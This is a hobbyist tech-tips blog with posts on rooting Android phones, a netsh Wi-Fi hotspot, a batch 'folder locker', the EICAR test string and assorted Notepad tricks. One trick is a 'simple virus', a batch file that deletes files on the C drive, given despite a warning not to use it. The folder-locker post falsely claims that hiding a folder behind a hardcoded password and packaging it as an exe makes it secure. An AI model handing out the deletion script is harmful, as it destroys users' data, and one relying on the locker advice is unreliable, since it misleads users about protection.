Showing posts with label Technologies Tricks. Show all posts
Showing posts with label Technologies Tricks. Show all posts

Friday, January 22, 2016

How to root android phone


Rooting is a process of allowing users of an Android devices like tablet, smart phone and other devices which has android operating system to access the system files.In short Rooting phone means accessing all system files of an Android devices.It is similar as giving administrator privilege in a computer.There are several advantages as well as disadvantages of it.

Why should you root your phone ?
  • To gain all access of your phone.
  • To manage or increase memory of your phone.
  • To avoid limitation of using your phone, because some of the advanced program like Link2SD, Battery Saver(DU), DroidVPN and other program needs root access.
Why Shouldn't you root your phone ?
  •     After rooting, warranty of your phone's will be terminated or avoided.

Steps to be followed :

  • Download SRS Root.
  • Install the app SRS Root in your PC.
  • Make sure that this enabled the resources of other platforms are google play. I can look at the following path: Menu > Settings > Unknown sources (ON).
  • Put your phone on USB Debugging mode (activate checkbox on Settings > Development option > USB debugging or Settings > Applications > Development > USB debugging).
  • Make sure the Android drivers for your phone are installed in your PC.
  • Connect your device to your PC via USB cable.
  • Run SRS Root in your PC.
  • Click on one of the ROOT options in this software, and wait till it’s finished.
  • If you want to check if you are already root or superuser in your Android phone or tablet you can download How To Root app from Google Play Store and click over the padlock in the top-right of the screen. It will show you a message about if your device is rooted or not.

Download sources:

DOWNLOAD SRS Root

DOWNLOAD SRS Root ( Alterntive link)



      Remember, you must root your device at your own risk !!!!
Read More »

Sunday, August 24, 2014

How to share internet connection from windows 7, 8 through command line (or prompt)

Nowadays Internet has become the most important and entertained part of our life, Everybody uses internet not only in home but also in outside of the home like Bus station, College, School, Office and many more.... with the help of wifi (wireless fidelity). But what happens if there is no such a devices like wifi router to share an internet connection. As we all know Computer has a fast internet connection rather than mobile phones. But today we are on the topic about to make your computer as a wifi hotspot or sharing fast internet connection from your computer to another wifi supportable devices like smart phones, tab, etc. This can easily solved with concept of Wireless Hosted Network was introduced in windows 7 from Microsoft windows. Now we are on the steps to make your computer as a wifi hotspot through command line with simple steps.



STEPS:-

  • First Run Command Prompt with administrative privilege.


  • Now Type netsh wlan show drivers, You will see pic like this and check whether your computer supports hosted network or not, If yes, it supports else it doesn't.




  • Now Type this command netsh wlan set hostednetwork mode=allow ssid=hotspotname key=password (You can change hostpotname and password with your own).




  • Now at last, Type this command netsh wlan start hostednetwork then you will see pic like this.




  • Now your computer is made as a wifi hotspot, but we still need to do simple and quick work for internet connection.
  • Now go to control panel >> Network and sharing center. And click on the Active internet connection and go to properties and sharing tab and  check the box "Allow other network users to connect through this computer's internet connection"and select the network connection name that is used by your hotspot. 


  • Now you are done....
  • You can stop it by command line. Go to command line and type this command netsh wlan stop hostednetwork.

Enjoy..........

Still having problems ?

Read More »

Saturday, May 24, 2014

Protect your folder with password without any software

Files inside of folders of a computer can be protected with password with different software, But today we are going to make an special program with notepad so that you can keep your file secretly.


What we need?

A Computer and a little bit of knowledge.

Steps: 

  • First open a Notepad and copy following code to the Notepad and save it with batch extension type (eg. private.bat ).
cls

@ECHO OFF

title Folder Private

if EXIST "HTG Locker" goto UNLOCK

if NOT EXIST Private goto MDLOCKER

:CONFIRM

echo Are you sure you want to lock the folder(Y/N)

set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "HTG Locker"
attrib +h +s "HTG Locker"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== binayagurung goto FAIL
attrib -h -s "HTG Locker"
ren "HTG Locker" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End
  • You can change password 'binayagurung' with your own.
Now your batch file is made and you can create a private folder protecting with above password (binayagurung).

This private.bat file is still unsecured anybody can change password by editing private.bat file, so now we are going to convert .bat file to .exe file so nobody can change the password that you have created.

Steps for converting .bat file to .exe file

  • First Go to run and type this command without quotation "iexpress", then you will see following picture.


  • Now click next button continuously until you get following picture.



  • Create your project title name like i named it protect, now again click on next button continuously until you get following picture.



  • Now you have to add a private.bat file that you have created earlier in a notepad. Then click on Next button continuously until you get following picture.



  • After that choose a private.bat from the list like i did, Then click on the Next button until you get following pic.



  • Now browse the location where you want to save .exe file ( i have saved private.exe file to desktop) and click on next button until you get following pic.



  • Check the 'No restart' radio button like i did and click on next button then it creates a .exe file then click on finish button.




Now you are done, you have successfully converted a .bat file to .exe file, Now nobody can change the password that you have created.


Any difficulties feel free to comment.

Read More »

Wednesday, May 21, 2014

How to verify that your antivirus is working or not?



Hey guys, today i am going to share this article to all the readers, so that you can verify your antivirus is working or not. Sometimes we become confused whether an Antivirus is working or not, But don't worry you can easily check or verify whether your antivirus is working or not, This type of Test is called ELCAR test and can be done easily with the simple steps. 

This test is totally harmless, so you do not need to do worry about it. ELCAR test allows us to check your antivirus is working or not, as an example, once you have made this file and when you try to open, your computer antivirus should identify this ELCAR test file as a virus, if your computer antivirus was not able to identify above file as a virus, then your computer antivirus may have a some problem.

Lets check your computer antivirus, whether it is working or not.



  • First open a Notepad, then copy and paste the following text.
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
  • Now save the file name as anyname and extension with .com .
  • Now open a file (that you have created at previous step).

If your virus is working you should trigger an alert saying virus found, if it didn't find any error or create any alert, then your antivirus is not working


NOTE: This file(that you have created earlier) is harmless, so you do not need to worry.



Read More »

Friday, May 16, 2014

Top Notepad Tricks

Notepad is one of the best platform for editing the text, anything can be written with any type of extension, Today i will share some most useful and interesting tricks of notepad.


Trick 1:

This trick is called Matrix effect trick.
  • First Open a Notepad.
  • Now copy and paste the following code.

@echo off
color 0a
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

  • Now save the file with .bat extension type.
  • Run the .bat file,Then you will have matrix Effect on your screen.


Trick 2:

This trick is called Keyboard Dancing Led.
  • First Open a Notepad.
  • Now cop and paste the following code.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop


  • Now save the file name as dance.vbs (where vbs is an extension you must include).
  • Run the dance.vbs file then you can see your keyboard lights are blinking like dancing.

How to Stop this.

  • First go to task manager(ctrl+alt+del).
  • Now exit the program named wscript.

Trick 3:

Make a simple virus, this is very dangerous trick, if you open this file you may lose all files from C drive or any specified Drive below (don't do this).
  • First open a Notepad.
  • Now copy and paste the following code.

@Echo off
Del C:\ *.* |y


  • Now save the file name as virus.bat (.bat is an extension, you must include).

Trick 4:

This is World trade center attack trick. The flight number of the plane that had hit World Trade Center on  (9/11) was Q33NY, Coincidentally it has become an amazing trick.
  • First Open a Notepad.
  • Now Copy and paste the following text.

Q33N
  • Now change the font size to 72 and font to wingdings.

Other tricks will be added soon So, keep visiting.

Read More »

Monday, May 12, 2014

How to enable hibernate mode in windows 8

Hibernation in computer means similar to doing shutdown mode in computer, but it saves the contents of its RAM (Random Access Memory) to the hard disk even if the powered off. It is more similar to sleep mode in computer but saves more power at the cost of slower resumption.




After buying or installing new windows 8 operating system to the computer there will be shutdown, restart and sleep mode in power option but not Hibernate. So, today we are going to enable hibernate mode in windows 8 step by step.

Steps:
  1. First go to control panel and click on power options.
  2. Now click on 'what the power buttons does' at the left side of the window.
  3. Click 'Change settings that are currently unavailable'.
  4. Now Scroll down to the bottom of that window to find the 'Shutdown settings' section.
  5. Check the box next to the hibernate enable option and click on 'save changes'.

Now you are done Now you will see Hibernate mode in power option as shown in the picture below.




Read More »

Thursday, May 1, 2014

how to root samsung galaxy GS5282 duos

Getting Bored of using Samsung Galaxy GS5282 duos with limited features ?

Root Your phone to get all features of using Samsung Galaxy GS5282 duos. Today i will share with you Two tricks to root Samsung Galaxy GS5282 duos with easy steps.
Before doing this activities make sure that our phone has atleast 60 % charged.

Trick 1:

  • First Download Cydia Impactor for windows OS from HERE.
  • Install the required drivers for your phone to your pc by installing samsung kies.
  • Enable USB debugging from Developer Options in your droid (if you have not enabled it previously) and connect your droid to your PC via data cable.
  • Now extract the file downloaded from first step and run Cydia Impactor.
  • The programme should be displaying the command # drop SuperSU su to /system/xbin/su as shown above. Click start and run this command in the Impactor and wait for a few seconds for the process to get completed. Now your phone is rooted.
  • At last you need to install SuperUser app from google play store app LINK.
  • And you also need to install BUSY BOX from play store (it is optional) LINK.
  • Now your Samsung galaxy GS5282 Duos is Rooted.

Trick 2:

This trick is done by installing rooted firmware on your samsung galaxaxy GS5282 duos.

  • First Download a program called ODIN from here on your pc and extract the files and run it with administrative privilage.
  • Download Pre-rooted firmware . Extract the downloaded file to some convenient location in your PC.
  • Now turn off your phone and restart it in Download Mode. To do so Press volume down+power +home buttons simultaneously while turning on your phone till you see warning triangle on the screen of your phone. Press volume Up key here to continue into the download mode.
  • Now connect your phone to pc via cable then wait untill you see "added" message on ODIN.


  • After your phone is detected by ODIN Click on PDA Button, then select the file "pre_rooted_system.tar"(Downloaded from second step).
  • Make sure that on Odin “repartition” option is not checked and “auto reboot” option is checked
  •  Now click on the “Start” button and let the process finish and you see “PASS” in a green box in Odin interference. Your phone will be rebooted automatically after this.

Now your phone have a new rooted firmware


Still Facing problem with rooting phone click here



NOTE: Rooting your phone will void your warranty, and can be dangerous. You may end up with a “bricked” device if anything goes wrong. I take no responsibility if something happens to your device. If you are ever in doubt STOP! This is not something to take lightly!
While rooting is reversible, it’s not something you should ever plan to do. Use some common sense here. If you don’t understand the consequences of what you are doing, DO NOT ROOT YOUR PHONE! You have been warned.
Read More »

Sunday, April 13, 2014

how to download android application from google play store from computer

Android Operating system is becoming popular day by day, Because of its more popular apps and we can also get it at cheap rate in the market as compared to other product like Apple. and of course most of the apps can be downloaded from google play store for free. such features making it to use on the computer using different kinds of emulator like Bluestack , Windroid Emulator and many more. To use android application through computer we need to download apk file which can not be downloaded directly from Google play store. But today i am going to share with you, how can we download android application from Google play store from the computer with simple steps.

Steps : 

  • now copy that selected link(app id) and go to http://apps.evozi.com/apk-downloader/ and paste the link that you have copied and click on 'Generate Download Link' (It may take few second or minute to complete, according to the size of a file).

  • After the completion of process you will see a new button saying click here to download [app-name] now then click on that button.
  • finally you will get apk file of an application , now you can install it to any emulator and can also install to the mobile devices.

Read More »

Saturday, April 12, 2014

How to change boot animation of android devices

What is an android boot animation?

Android Boot animation is a term for a graphical representation of the boot process of an android operating system.


Short definition of changing boot animation of an android devices.

Boot animation of an android devices can be changed with different methods like using android terminal, using computer and using root browser app like root explorer. But easier and fast method is done by using root explorer.

How to change boot animation of an android devices ?

  • first download the bootanimation.zip file (link are given at the last of the post).
  • change the file name into bootanimation.zip (In case of other name).
  • Now open Root Explorer (download root explorer from here
  • Open Root explorer and once inside, locate your original boot animation file (bootanimation.zip) in /system/media.
  • And save original bootanimation.zip to sd card (optional).
  • Now browse the bootanimation.zip that you have downloaded from here and copy and paste it to the /system/media folder (make sure it's read/write).
  • Now reboot the phone.

Note: You have to make sure that the file name is correct (bootanimation.zip) for the system to recognize your boot animation, and boot properly.

BOOT ANIMATION FILES:
























Other boot animations will be added soon.......




Read More »